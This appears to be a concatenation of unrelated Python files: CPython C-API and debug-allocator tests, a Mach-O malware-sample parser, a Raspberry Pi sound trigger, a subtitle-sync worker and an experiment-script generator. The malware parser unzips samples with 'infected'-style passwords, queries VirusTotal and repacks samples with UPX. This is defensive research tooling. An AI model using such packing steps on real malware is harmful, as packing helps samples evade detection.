        # some extra thread-state tests driven via _testcapi
        def target():
            idents = []

            def callback():
                idents.append(threading.get_ident())

            _testcapi._test_thread_state(callback)
            # NOTE(review): presumably keeps extra references to callback
            # alive across the C call — confirm against _testcapi.
            a = b = callback
            time.sleep(1)
            # Check our main thread is in the list exactly 3 times.
            self.assertEqual(idents.count(threading.get_ident()), 3,
                             "Couldn't find main thread correctly in the list")

        # Run once on this thread, then once on a fresh thread.
        target()
        t = threading.Thread(target=target)
        t.start()
        t.join()
class Test_testcapi(unittest.TestCase):
    # Expose every test_* callable from the _testcapi C module as a
    # method of this class, except the *_code variants.
    locals().update((name, getattr(_testcapi, name))
                    for name in dir(_testcapi)
                    if name.startswith('test_') and not name.endswith('_code'))

    # Suppress warning from PyUnicode_FromUnicode().
    @warnings_helper.ignore_warnings(category=DeprecationWarning)
    def test_widechar(self):
        _testcapi.test_widechar()

    def test_version_api_data(self):
        # Py_Version (C) must agree with sys.hexversion (Python).
        self.assertEqual(_testcapi.Py_Version, sys.hexversion)
class Test_testinternalcapi(unittest.TestCase):
    # Expose every test_* callable from the _testinternalcapi C module
    # as a method of this class.
    locals().update((name, getattr(_testinternalcapi, name))
                    for name in dir(_testinternalcapi)
                    if name.startswith('test_'))
class PyMemDebugTests(unittest.TestCase):
    """Run snippets under PYTHONMALLOC debug hooks and check the reports."""
    PYTHONMALLOC = 'debug'
    # '0x04c06e0' or '04C06E0'
    PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'

    def check(self, code):
        # Run *code* in a subprocess with the configured allocator; the
        # snippet is expected to abort, and the decoded stderr crash
        # report is returned.
        with support.SuppressCrashReport():
            out = assert_python_failure(
                '-c', code,
                PYTHONMALLOC=self.PYTHONMALLOC,
                # FreeBSD: instruct jemalloc to not fill freed() memory
                # with junk byte 0x5a, see JEMALLOC(3)
                MALLOC_CONF="junk:false",
            )
        stderr = out.err
        return stderr.decode('ascii', 'replace')

    def test_buffer_overflow(self):
        out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
        regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
                 r"    16 bytes originally requested\n"
                 r"    The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
                 r"    The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
                 r"        at tail\+0: 0x78 \*\*\* OUCH\n"
                 r"        at tail\+1: 0xfd\n"
                 r"        at tail\+2: 0xfd\n"
                 r"        .*\n"
                 r"(    The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
                 r"    Data at p: cd cd cd .*\n"
                 r"\n"
                 r"Enable tracemalloc to get the memory block allocation traceback\n"
                 r"\n"
                 r"Fatal Python error: _PyMem_DebugRawFree: bad trailing pad byte")
        regex = regex.format(ptr=self.PTR_REGEX)
        regex = re.compile(regex, flags=re.DOTALL)
        self.assertRegex(out, regex)

    def test_api_misuse(self):
        out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
        regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
                 r"    16 bytes originally requested\n"
                 r"    The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
                 r"    The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
                 r"(    The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
                 r"    Data at p: cd cd cd .*\n"
                 r"\n"
                 r"Enable tracemalloc to get the memory block allocation traceback\n"
                 r"\n"
                 r"Fatal Python error: _PyMem_DebugRawFree: bad ID: Allocated using API 'm', verified using API 'r'\n")
        regex = regex.format(ptr=self.PTR_REGEX)
        self.assertRegex(out, regex)

    def check_malloc_without_gil(self, code):
        out = self.check(code)
        expected = ('Fatal Python error: _PyMem_DebugMalloc: '
                    'Python memory allocator called without holding the GIL')
        self.assertIn(expected, out)

    def test_pymem_malloc_without_gil(self):
        # Debug hooks must raise an error if PyMem_Malloc() is called
        # without holding the GIL
        code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
        self.check_malloc_without_gil(code)

    def test_pyobject_malloc_without_gil(self):
        # Debug hooks must raise an error if PyObject_Malloc() is called
        # without holding the GIL
        code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
        self.check_malloc_without_gil(code)

    def check_pyobject_is_freed(self, func_name):
        # The C helper frees an object; the snippet must exit cleanly
        # (os._exit) rather than crash during teardown.
        code = textwrap.dedent(f'''
            import gc, os, sys, _testcapi
            # Disable the GC to avoid crash on GC collection
            gc.disable()
            try:
                _testcapi.{func_name}()
                # Exit immediately to avoid a crash while deallocating
                # the invalid object
                os._exit(0)
            except _testcapi.error:
                os._exit(1)
        ''')
        assert_python_ok(
            '-c', code,
            PYTHONMALLOC=self.PYTHONMALLOC,
            MALLOC_CONF="junk:false",
        )

    def test_pyobject_null_is_freed(self):
        self.check_pyobject_is_freed('check_pyobject_null_is_freed')

    def test_pyobject_uninitialized_is_freed(self):
        self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')

    def test_pyobject_forbidden_bytes_is_freed(self):
        self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')

    def test_pyobject_freed_is_freed(self):
        self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
    """Same checks with PYTHONMALLOC=malloc_debug."""
    PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
    """Same checks with PYTHONMALLOC=pymalloc_debug (requires pymalloc)."""
    PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
    # test default allocator of Python compiled in debug mode
    PYTHONMALLOC = ''
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
class Test_ModuleStateAccess(unittest.TestCase):
    """Test access to module state (PEP 573)"""
    # The C part of the tests lives in _testmultiphase, in a module called
    # _testmultiphase_meth_state_access.
    # This module has multi-phase initialization, unlike _testcapi.

    def setUp(self):
        # Load a fresh instance of the multi-phase extension module.
        fullname = '_testmultiphase_meth_state_access'  # XXX
        origin = importlib.util.find_spec('_testmultiphase').origin
        loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
        spec = importlib.util.spec_from_loader(fullname, loader)
        module = importlib.util.module_from_spec(spec)
        loader.exec_module(module)
        self.module = module

    def test_subclass_get_module(self):
        """PyType_GetModule for defining_class"""
        class StateAccessType_Subclass(self.module.StateAccessType):
            pass

        instance = StateAccessType_Subclass()
        self.assertIs(instance.get_defining_module(), self.module)

    def test_subclass_get_module_with_super(self):
        # Same check, but going through super() in a Python subclass.
        class StateAccessType_Subclass(self.module.StateAccessType):
            def get_defining_module(self):
                return super().get_defining_module()

        instance = StateAccessType_Subclass()
        self.assertIs(instance.get_defining_module(), self.module)

    def test_state_access(self):
        """Checks methods defined with and without argument clinic

        This tests a no-arg method (get_count) and a method with
        both a positional and keyword argument.
        """
        a = self.module.StateAccessType()
        b = self.module.StateAccessType()

        methods = {
            'clinic': a.increment_count_clinic,
            'noclinic': a.increment_count_noclinic,
        }

        for name, increment_count in methods.items():
            with self.subTest(name):
                # Both instances share the module-level counter.
                self.assertEqual(a.get_count(), b.get_count())
                self.assertEqual(a.get_count(), 0)

                increment_count()
                self.assertEqual(a.get_count(), b.get_count())
                self.assertEqual(a.get_count(), 1)

                increment_count(3)
                self.assertEqual(a.get_count(), b.get_count())
                self.assertEqual(a.get_count(), 4)

                increment_count(-2, twice=True)
                self.assertEqual(a.get_count(), b.get_count())
                self.assertEqual(a.get_count(), 0)

                with self.assertRaises(TypeError):
                    increment_count(thrice=3)

                with self.assertRaises(TypeError):
                    increment_count(1, 2, 3)
# Run the whole suite when executed directly.
if __name__ == "__main__":
    unittest.main()
|
parse_machos.py | """
Copyright 2021 Kimo Bumanglag <kimo.bumanglag@trojans.dsu.edu>
"""
# Standard library
import argparse
import json
import math
import os
import subprocess
import sys
import zipfile
from threading import Thread

# Third-party
import py7zr
import magic
# Bug fix: `import vt-py` is a SyntaxError (module names cannot contain
# '-'); the vt-py package is imported as `vt`, matching vt.Client() below.
import vt
from macholibre import parse
from tqdm import tqdm

parser = argparse.ArgumentParser(
    description="Search a filesystem for Mach-O files and parse them to JSON objects."
)
parser.add_argument(
    "--path", default=".", type=str, help="Where to look for Mach-O files."
)
parser.add_argument(
    "--passwords",
    default=["infected", "virussign", "infect3d"],
    nargs="+",
    type=str,
    help="Passwords to unzip samples.",
)
parser.add_argument(
    "--tmpdir",
    default="/tmp/samples",
    type=str,
    help="Where to output extracted zip objects.",
)
parser.add_argument(
    "--outdir",
    default="/tmp/json_data",
    type=str,
    help="Where to output JSON objects.",
)
args = parser.parse_args()

# Create the work folders up front; makedirs also covers missing parents
# (the original os.mkdir failed when the parent did not exist).
os.makedirs(args.tmpdir, exist_ok=True)
os.makedirs(args.outdir, exist_ok=True)
def calculateEntropy(filename: str) -> float:
    """Return the Shannon entropy (bits per byte) of *filename*'s contents.

    Bug fixes vs the original:
    - an empty file caused a ZeroDivisionError; it now returns 0.0,
    - the byte frequencies were computed with 256 full passes over the
      data (O(256*n)); a single counting pass is used instead.
    """
    from collections import Counter

    with open(filename, "rb") as f:
        data = f.read()
    filesize = len(data)
    if filesize == 0:
        return 0.0
    # Shannon entropy: -sum(p * log2(p)) over the observed byte values.
    ent = 0.0
    for count in Counter(data).values():
        freq = count / filesize
        ent -= freq * math.log(freq, 2)
    return ent
def getFiletype(filename: str) -> str:
    """
    Checks whether the provided file is a Macho-O, 7-zip, or Zip.
    Argument: a filename to check
    Return: one of selected filetypes
    """
    # libmagic's human-readable description, e.g. "Mach-O 64-bit ...".
    filetype = magic.from_file(filename)
    if "Mach-O" in filetype:
        return "Macho"
    elif "7-zip" in filetype:
        return "7zip"
    elif "Zip" in filetype:
        return "Zip"
    # NOTE(review): implicitly returns None for any other file type;
    # getFiles() relies on that by simply matching none of its buckets.
def unzipFile(filename: str):
    """
    Extracts zip files to the specified output directory, trying each
    configured password in turn.
    Argument: a zip filename to extract
    """
    try:
        myzip = zipfile.ZipFile(filename)
    except zipfile.BadZipFile:
        # Bug fix: the original `pass`ed here and then hit a NameError
        # on the unbound `myzip` below; bail out instead.
        print(f"Failed to open {filename} as a zip")
        return
    with myzip:
        for password in args.passwords:
            try:
                myzip.extractall(path=args.tmpdir, pwd=bytes(password, "ascii"))
                break
            except Exception:
                # Narrowed from a bare `except:` (which also swallowed
                # KeyboardInterrupt/SystemExit).
                print(f"Failed to extract {filename} with {password}")
def un7zipFile(filename: str):
    """
    Extracts 7zip files to the specified output directory, trying each
    configured password in turn.
    Argument: a 7zip filename to extract
    """
    try:
        myzip = py7zr.SevenZipFile(filename)
    except Exception:
        # Bug fix: the original `pass`ed here and then hit a NameError
        # on the unbound `myzip` below; bail out instead.
        print(f"Failed to open {filename} as a 7z archive")
        return
    for password in args.passwords:
        try:
            myzip.extractall(path=args.tmpdir, password=bytes(password, "ascii"))
            break
        except Exception:
            print(f"Failed to extract with {password}")
def getFiles(path: str, file_list: dict):
    """
    Walk *path* and append readable Mach-O, Zip, and 7-Zip files to the
    matching list in *file_list*.

    Arguments: path - the directory to walk
               file_list - dict with 'machos', 'zips' and '7zips' lists
               (the original annotation said `list`, but every caller
               passes this dict — annotation fixed).
    """
    # Map getFiletype() results to the destination bucket key.
    buckets = {"Macho": "machos", "Zip": "zips", "7zip": "7zips"}
    for root, dirs, files in os.walk(path):
        for filename in files:
            fullpath = os.path.join(root, filename)
            # Skip files we cannot read (magic would fail on them).
            if not os.access(fullpath, os.R_OK):
                continue
            bucket = buckets.get(getFiletype(fullpath))
            if bucket is not None:
                file_list[bucket].append(fullpath)
def extractZipLists(file_list: dict):
    """
    Start an extraction thread for every queued zip/7zip, then clear the
    queues.

    Bug fixes vs the original: the outer `for filegroup in file_list`
    loop ran the whole body once per dict key, and removing items from a
    list while iterating it skipped every other element.
    """
    for filename in file_list["zips"]:
        Thread(target=unzipFile, args=(filename,)).start()
    file_list["zips"].clear()
    for filename in file_list["7zips"]:
        Thread(target=un7zipFile, args=(filename,)).start()
    file_list["7zips"].clear()
def pack_file(filename: str, sha256: str):
    """
    Call subprocess to execute UPX and pack a valid Mach-O.
    Arguments: filename - the file to pack; sha256 - names the output file
    Return: the packed file's path on success, False on failure
    """
    basename = f"{sha256}.packed"
    out_file = os.path.join(args.outdir, basename)
    cmd = ["upx", filename, "-k", f"-o{out_file}"]
    process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    fout, ferr = process.communicate()
    # Bug fix: success was judged by "stderr is empty"; judge by the
    # exit status instead — tools may write warnings/banners to stderr
    # and still succeed.
    if process.returncode == 0:
        return out_file
    return False
def parseFile(filename: str):
    """
    Parse one Mach-O with macholibre, enrich the result with entropy and
    VirusTotal data, pack it with UPX and parse the packed copy too,
    writing <sha256>.json and <sha256>.packed.json into args.outdir.

    Relies on the module-level `client` (vt.Client) created in __main__.
    """
    try:
        print(f"[ ] Parsing (unknown)")
        data = parse(filename)
        data["filepath"] = filename
        data["entropy"] = calculateEntropy(filename)
        sha256 = data["hashes"]["sha256"]
        # VirusTotal lookup by hash.
        vtresults = client.get_object(f"/files/{sha256}")
        data["vtresults"] = vtresults
        packed = pack_file(filename, sha256)
        # NOTE(review): the unpacked JSON is only written when packing
        # succeeds — if UPX fails, nothing is written at all; confirm
        # this is intended.
        if packed:
            basename = sha256 + ".json"
            out_file = os.path.join(args.outdir, basename)
            with open(out_file, "w") as f:
                f.write(json.dumps(data))
            # Parse the packed variant as well, for comparison.
            datap = parse(packed)
            datap["filepath"] = packed
            datap["entropy"] = calculateEntropy(packed)
            datap["vtresults"] = vtresults
            basenamep = sha256 + ".packed.json"
            out_filep = os.path.join(args.outdir, basenamep)
            with open(out_filep, "w") as f:
                f.write(json.dumps(datap))
    except Exception as e:
        # Best-effort batch processing: log and continue with other files.
        print(f"[-] Failed to parse (unknown): {e}")
if __name__ == "__main__":
    # NOTE(review): empty API key — vt.Client("") cannot authenticate;
    # supply a real key before running.
    client = vt.Client("")
    file_list = {}
    file_list["machos"] = []
    file_list["zips"] = []
    file_list["7zips"] = []
    getFiles(args.path, file_list)
    total_files = (
        len(file_list["machos"]) + len(file_list["zips"]) + len(file_list["7zips"])
    )
    print("Found {0} files".format(total_files))
    # extractZipLists(file_list)
    # Second walk picks up anything previously extracted into tmpdir.
    getFiles(args.tmpdir, file_list)
    print("Total malware: {0}".format(len(file_list["machos"])))
    # NOTE(review): one unjoined thread per file — unbounded concurrency
    # and the progress bar only tracks thread *starts*, not completions.
    for filename in tqdm(file_list["machos"], bar_format="{l_bar}{bar}"):
        new_thread = Thread(target=parseFile, args=(filename,))
        new_thread.start()
|
# Play a sound whenever the GPIO button on BCM pin 24 is pressed.
import RPi.GPIO as GPIO
import time
import threading
from pygame import mixer

mixer.init()
GPIO.setmode(GPIO.BCM)
INPUT = 24  # BCM pin number of the button input
GPIO.setwarnings(False)
GPIO.setup([INPUT], GPIO.IN , pull_up_down=GPIO.PUD_DOWN)

# Toggle: the first press starts playback, the next press re-arms it.
isFirstPress = True

def music_thread():
    # Runs in a daemon thread so loading/playing doesn't block the
    # GPIO callback.
    mixer.music.load('./audio/Moose-Sound.wav')
    mixer.music.play()

def handle(pin):
    # Rising-edge callback registered via add_event_detect below.
    global isFirstPress
    if isFirstPress == True:
        t = threading.Thread(target=music_thread)
        t.daemon = True
        t.start()
        print("starting playback")
        isFirstPress = False
        # NOTE(review): sleeping here blocks the edge-detection callback
        # for 3 s — presumably a debounce; confirm this is intended.
        time.sleep(3)
    else:
        isFirstPress = True

GPIO.add_event_detect(INPUT, GPIO.RISING, handle)

# Keep the process alive; all work happens in the GPIO callback thread.
while True:
    time.sleep(1e6)
|
subsync.py | import os
import time
import shlex
import shutil
import requests
import threading
import json
from watchdog.observers import Observer
from watchdog.events import FileSystemEvent, FileSystemEventHandler
from subprocess import check_call, DEVNULL, check_output, STDOUT, CalledProcessError
# Bazarr connection settings come from the environment.
BAZARR_URL = os.environ.get('BAZARR_URL')
BAZARR_API_KEY = os.environ.get('BAZARR_API_KEY')
BAZARR_USERNAME = os.environ.get('BAZARR_USERNAME')
BAZARR_PASSWORD = os.environ.get('BAZARR_PASSWORD')
# Number of concurrent sync workers (defaults to 1 when unset).
NUM_WORKERS = int(os.environ.get('NUM_WORKERS')) if os.environ.get('NUM_WORKERS') else 1

JOBS_FOLDER = '/.config/jobs'
FAILED_JOBS_FOLDER = '/.config/failed_jobs'
if not os.path.exists(JOBS_FOLDER):
    os.mkdir(JOBS_FOLDER)
if not os.path.exists(FAILED_JOBS_FOLDER):
    os.mkdir(FAILED_JOBS_FOLDER)

# Shared state between the watchdog handler, the main loop and workers.
event_lock = threading.Lock()
last_file_event = 0   # time.time() of the most recent filesystem event
last_event = None     # the event itself (used to de-duplicate logging)
worker_sem = threading.Semaphore(NUM_WORKERS)  # bounds concurrent sync()s
working_lock = threading.Lock()
working = set()       # job paths currently being processed
class AnyEventHandler(FileSystemEventHandler):
    """Watchdog handler that timestamps the most recent filesystem event.

    Updates the module-level last_file_event/last_event under event_lock;
    the main loop uses the timestamp to wait for a quiet period before
    dispatching job files.
    """

    def on_any_event(self, event):
        global last_file_event
        global last_event
        # Bug fix: use a with-block so the lock is released even if the
        # body raises (the original acquire/release pair could leak it).
        with event_lock:
            now = time.time()
            if now > last_file_event:
                last_file_event = now
            # Log only events for a new path, to avoid duplicate spam.
            if not isinstance(last_event, FileSystemEvent) or event.src_path != last_event.src_path:
                print(event)
                last_event = event
def sync(file):
    """Process one subtitle-sync job file.

    Tries subsync first, falls back to ffsubsync, and on a double
    failure blacklists the subtitle in Bazarr (or parks the job file in
    FAILED_JOBS_FOLDER if that cannot be done).  The finally block
    always removes the job file, clears the in-progress marker, and
    frees a worker-semaphore slot.
    """
    global worker_sem
    global working
    with open(file, 'r') as f:
        job = json.load(f)
    if job['ref_lang'] == 'None':
        job['ref_lang'] = 'eng'
    # NOTE(review): presumably maps ISO 639-2/T codes (fra/deu) to the
    # /B codes (fre/ger) that subsync expects — confirm.
    subsync_ref_lang = job['ref_lang'] \
        .replace('fra', 'fre') \
        .replace('deu', 'ger') \
        .replace('lit', 'eng')  # Bazarr thinks YTS.LT releases are Lithuanian
    subsync_sub_lang = job['sub_lang'] \
        .replace('fra', 'fre') \
        .replace('deu', 'ger') \
        .replace('lit', 'eng')  # Bazarr thinks YTS.LT releases are Lithuanian
    print(f'Syncing {os.path.basename(file)}')
    command = f'/subsync/bin/subsync --cli --verbose 0 sync ' \
              f'--ref "{job["ref"]}" --ref-stream-by-type audio --ref-lang "{subsync_ref_lang}" ' \
              f'--sub "{job["sub"]}" --sub-lang "{subsync_sub_lang}" ' \
              f'--out "{job["sub"]}" --overwrite'
    try:
        check_call(shlex.split(command), stdout=DEVNULL, stderr=DEVNULL)
        print(f'Successful subsync {os.path.basename(file)}')
        # A previous failure record for this job is now obsolete.
        if os.path.exists(os.path.join(FAILED_JOBS_FOLDER, os.path.basename(file))):
            os.remove(os.path.join(FAILED_JOBS_FOLDER, os.path.basename(file)))
    except CalledProcessError as e:
        print(f'Subsync failed {os.path.basename(file)} | {e}')
        # Fallback: ffsubsync on the same reference/subtitle pair.
        command = f'/usr/local/bin/ffsubsync "{job["ref"]}" -i "{job["sub"]}" ' \
                  f' --max-offset-seconds 600 --encoding UTF-8 --overwrite-input'
        try:
            stdout = check_output(shlex.split(command), stderr=STDOUT, encoding='UTF-8')
            # ffsubsync can exit 0 yet fail; detect that via its output.
            if 'Synchronization failed' in str(stdout):
                raise CalledProcessError(2, shlex.split(command))
            print(f'Successful ffsubsync {os.path.basename(file)}')
            if os.path.exists(os.path.join(FAILED_JOBS_FOLDER, os.path.basename(file))):
                os.remove(os.path.join(FAILED_JOBS_FOLDER, os.path.basename(file)))
        except CalledProcessError as e:
            print(f'FFSubsync failed {os.path.basename(file)} | {e}')
            print(f'Blacklisting {os.path.basename(file)}')
            # Log in to Bazarr, then blacklist the subtitle so it gets
            # re-downloaded from another provider.
            s = requests.session()
            headers = {"x-api-key": BAZARR_API_KEY}
            r = s.post(f"{BAZARR_URL}/api/system/account?action=login",
                       data={"username": BAZARR_USERNAME, "password": BAZARR_PASSWORD})
            if not r.ok:
                print("Authentication failed")
                shutil.copy(file, os.path.join(FAILED_JOBS_FOLDER, os.path.basename(file)))
            else:
                data = {
                    'subtitles_path': job["sub"],
                    'provider': job["provider"],
                    'subs_id': job["sub_id"],
                    'language': job["sub_code_2"],
                }
                # Movies (no series_id) go to the radarr endpoint.
                if not job["series_id"]:
                    url = f"{BAZARR_URL}/api/movies/blacklist?radarrid={job['episode_id']}"
                else:
                    url = f"{BAZARR_URL}/api/episodes/blacklist?seriesid={job['series_id']}&episodeid={job['episode_id']}"
                r = s.post(url, data=data, headers=headers)
                if r.ok:
                    print(f'Blacklisted {os.path.basename(file)}')
                else:
                    print(f'Failed to blacklist {os.path.basename(file)} : {r.text}')
                    shutil.copy(file, os.path.join(FAILED_JOBS_FOLDER, os.path.basename(file)))
    finally:
        # Success or failure: drop the job file, clear the in-progress
        # marker, and free a worker slot.
        working_lock.acquire()
        os.remove(file)
        working.remove(file)
        working_lock.release()
        worker_sem.release()
if __name__ == '__main__':
    # Watch the jobs folder; once it has been quiet for 10 seconds,
    # dispatch every job file that is not already being worked on.
    observer = Observer()
    observer.schedule(AnyEventHandler(), JOBS_FOLDER, recursive=True)
    observer.start()
    while True:
        time.sleep(3)
        event_lock.acquire()
        content = os.listdir(JOBS_FOLDER)
        if last_file_event + 10 < time.time():
            event_lock.release()
            for thing in content:
                path = os.path.join(JOBS_FOLDER, thing)
                # Skip paths a worker already owns.
                working_lock.acquire()
                cond = path in working
                working_lock.release()
                if cond:
                    continue
                if os.path.exists(path):
                    if os.path.isfile(path):
                        # Reserve a worker slot and mark the job as taken
                        # before handing it to the worker thread.
                        worker_sem.acquire()
                        working_lock.acquire()
                        working.add(path)
                        working_lock.release()
                        worker = threading.Thread(target=sync, args=(path,))
                        worker.start()
                    else:
                        print(f'Warning: non-file found in jobs queue ({thing})')
                else:
                    print(f"Job file doesn't exist ({thing})")
        else:
            # Still within the quiet window; try again next cycle.
            event_lock.release()
|
tb_experiments.py | import argparse
import itertools
import multiprocessing
import stat
import time
import psutil
import os
import json
import uuid
import research_toolbox.tb_filesystem as tb_fs
import research_toolbox.tb_io as tb_io
import research_toolbox.tb_logging as tb_lg
import research_toolbox.tb_utils as tb_ut
import research_toolbox.tb_random as tb_ra
class CommandLineArgs:
    """Thin wrapper around argparse.ArgumentParser that prefixes every
    option name with a fixed string."""

    def __init__(self, argname_prefix=''):
        self.parser = argparse.ArgumentParser()
        self.argname_prefix = argname_prefix

    def add(self,
            argname,
            argtype,
            default_value=None,
            optional=False,
            help=None,
            valid_value_lst=None,
            list_valued=False):
        """Register one '--<prefix><argname>' option.

        argtype is one of 'int', 'str', 'float'; list_valued makes the
        option accept zero or more values (nargs='*').
        """
        valid_types = {'int': int, 'str': str, 'float': float}
        assert argtype in valid_types
        self.parser.add_argument(
            '--' + self.argname_prefix + argname,
            required=not optional,
            default=default_value,
            nargs='*' if list_valued else None,
            type=valid_types[argtype],
            choices=valid_value_lst,
            help=help)

    def parse(self):
        """Parse sys.argv and return the options as a plain dict."""
        return vars(self.parser.parse_args())

    def get_parser(self):
        """Expose the underlying ArgumentParser."""
        return self.parser
def get_available_filename(folderpath, filename_prefix):
    """Return the first '<prefix><idx>' name not yet present in folderpath."""
    for idx in itertools.count():
        candidate = "%s%d" % (filename_prefix, idx)
        if not tb_fs.path_exists(tb_fs.join_paths([folderpath, candidate])):
            return candidate
def get_config():
    """Parse --config_filepath from the command line and return the JSON
    configuration (with overlays) it points to."""
    cmd = CommandLineArgs()
    cmd.add('config_filepath', 'str')
    out = cmd.parse()
    cfg = tb_io.read_jsonfile_with_overlays(out['config_filepath'])
    return cfg
# generating the call lines for a call to main.
def generate_call_lines(main_filepath,
                        argname_lst,
                        argvalue_lst,
                        output_filepath=None,
                        profile_filepath=None):
    """Build the shell lines for one `python main_filepath --k v ...` call.

    argname_lst/argvalue_lst pair up positionally; the last argument is
    emitted separately so the optional stdout/stderr redirection can be
    appended after it.  profile_filepath enables cProfile output.

    Bug fix: the original used itertools.izip, which does not exist in
    Python 3; the builtin zip is used instead.
    """
    sc_lines = ['export PYTHONPATH=".:$PYTHONPATH" && python -u \\']
    # add the profiling instruction.
    if profile_filepath is not None:
        sc_lines += ['-m cProfile -o %s \\' % profile_filepath]
    sc_lines += ['%s \\' % main_filepath]
    # arguments for the call (all but the last, which may carry the redirect)
    sc_lines += [
        ' --%s %s \\' % (k, v)
        for k, v in zip(argname_lst[:-1], argvalue_lst[:-1])
    ]
    # add the output redirection.
    if output_filepath is not None:
        sc_lines += [
            ' --%s %s \\' % (argname_lst[-1], argvalue_lst[-1]),
            ' > %s 2>&1' % (output_filepath)
        ]
    else:
        sc_lines += [' --%s %s' % (argname_lst[-1], argvalue_lst[-1])]
    return sc_lines
# all paths are relative to the current working directory or to entry folder path.
def create_run_script(
        main_filepath,
        argname_lst,
        argvalue_lst,
        script_filepath,
        # entry_folderpath=None,
        output_filepath=None,
        profile_filepath=None):
    """Write an executable bash script at script_filepath that runs
    main_filepath with the given arguments (see generate_call_lines)."""
    sc_lines = ['#!/bin/bash', 'set -e']
    # # change into the entry folder if provided.
    # if entry_folderpath is not None:
    #     sc_lines += ['cd %s' % entry_folderpath]
    # call the main function.
    # NOTE(review): forwards a subset of locals() by name — fragile if
    # parameter names are ever renamed.
    sc_lines += generate_call_lines(
        **tb_ut.subset_dict_via_selection(locals(), [
            'main_filepath', 'argname_lst', 'argvalue_lst', 'output_filepath',
            'profile_filepath'
        ]))
    # change back to the previous folder if I change to some other folder.
    # if entry_folderpath is not None:
    #     sc_lines += ['cd -']
    tb_io.write_textfile(script_filepath, sc_lines, with_newline=True)
    # add run permissions.
    st = os.stat(script_filepath)
    exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    os.chmod(script_filepath, st.st_mode | exec_bits)
# NOTE: can be done more concisely with a for loop.
def create_runall_script(experiment_folderpath):
    """Write <experiment_folderpath>/run.sh invoking every cfg*/run.sh.

    Bug fix: the original used the Python 2 builtin `xrange`, which does
    not exist in Python 3; replaced with `range`.
    """
    fo_names = tb_fs.list_folders(
        experiment_folderpath, recursive=False, use_relative_paths=True)
    num_exps = len(
        [n for n in fo_names if tb_fs.path_last_element(n).startswith('cfg')])

    # creating the script.
    sc_lines = ['#!/bin/bash']
    sc_lines += [
        tb_fs.join_paths([experiment_folderpath,
                          "cfg%d" % i, 'run.sh']) for i in range(num_exps)
    ]
    # creating the run all script.
    out_filepath = tb_fs.join_paths([experiment_folderpath, 'run.sh'])
    tb_io.write_textfile(out_filepath, sc_lines, with_newline=True)
    # add run permissions.
    st = os.stat(out_filepath)
    exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    os.chmod(out_filepath, st.st_mode | exec_bits)
# NOTE: for now, this relies on the fact that upon completion of an experiment
# a results.json file, i.e., the existence of this file is used to determine
# if the folder related to this experiment has been run or not.
def create_runall_script_with_parallelization(experiment_folderpath):
    """Write an executable top-level ``run.sh`` that runs every ``cfg<i>``
    configuration, with optional worker sharding and rerun control.

    The generated bash script accepts ``[worker_id num_workers]
    [--force-rerun]``: worker ``w`` runs configuration ``i`` iff
    ``i % num_workers == w``, and a configuration is skipped when its
    ``results.json`` already exists unless ``--force-rerun`` is given.
    """
    fo_names = tb_fs.list_folders(
        experiment_folderpath, recursive=False, use_relative_paths=True)
    num_exps = len(
        [n for n in fo_names if tb_fs.path_last_element(n).startswith('cfg')])
    # creating the script.
    sc_lines = [
        '#!/bin/bash',
        # BUG FIX: the original emitted `[ "$#" -lt 0 ] && [ "$#" -gt 3 ]`,
        # which can never be true, so this usage check was dead code; the
        # intended logic (mirroring the worker_id check below) is `||`.
        'if [ "$#" -lt 0 ] || [ "$#" -gt 3 ]; then',
        '    echo "Usage: run.sh [worker_id num_workers] [--force-rerun]"',
        '    exit 1', 'fi', 'force_rerun=0',
        'if [ $# -eq 0 ] || [ $# -eq 1 ]; then', '    worker_id=0',
        '    num_workers=1', '    if [ $# -eq 1 ]; then',
        '        if [ "$1" != "--force-rerun" ]; then',
        '            echo "Usage: run.sh [worker_id num_workers] [--force-rerun]"',
        '            exit 1', '        else', '            force_rerun=1',
        '        fi', '    fi', 'else', '    worker_id=$1',
        '    num_workers=$2', '    if [ $# -eq 3 ]; then',
        '        if [ "$3" != "--force-rerun" ]; then',
        '            echo "Usage: run.sh [worker_id num_workers] [--force-rerun]"',
        '            exit 1', '        else', '            force_rerun=1',
        '        fi', '    fi', 'fi',
        'if [ $num_workers -le $worker_id ] || [ $worker_id -lt 0 ]; then',
        '    echo "Invalid call: requires 0 <= worker_id < num_workers."',
        '    exit 1', 'fi',
        # BUG FIX: the original was missing a comma after the 'fi' above, so
        # this intended blank line was fused onto it via implicit adjacent
        # string-literal concatenation and never emitted.
        '',
        'num_exps=%d' % num_exps, 'i=0', 'while [ $i -lt $num_exps ]; do',
        '    if [ $(($i % $num_workers)) -eq $worker_id ]; then',
        '        if [ ! -f %s ] || [ $force_rerun -eq 1 ]; then' %
        tb_fs.join_paths([experiment_folderpath, "cfg$i", 'results.json']),
        '            echo cfg$i',
        '            %s' % tb_fs.join_paths(
            [experiment_folderpath, "cfg$i", 'run.sh']),
        '        fi', '    fi',
        '    i=$(($i + 1))', 'done'
    ]
    # creating the run all script.
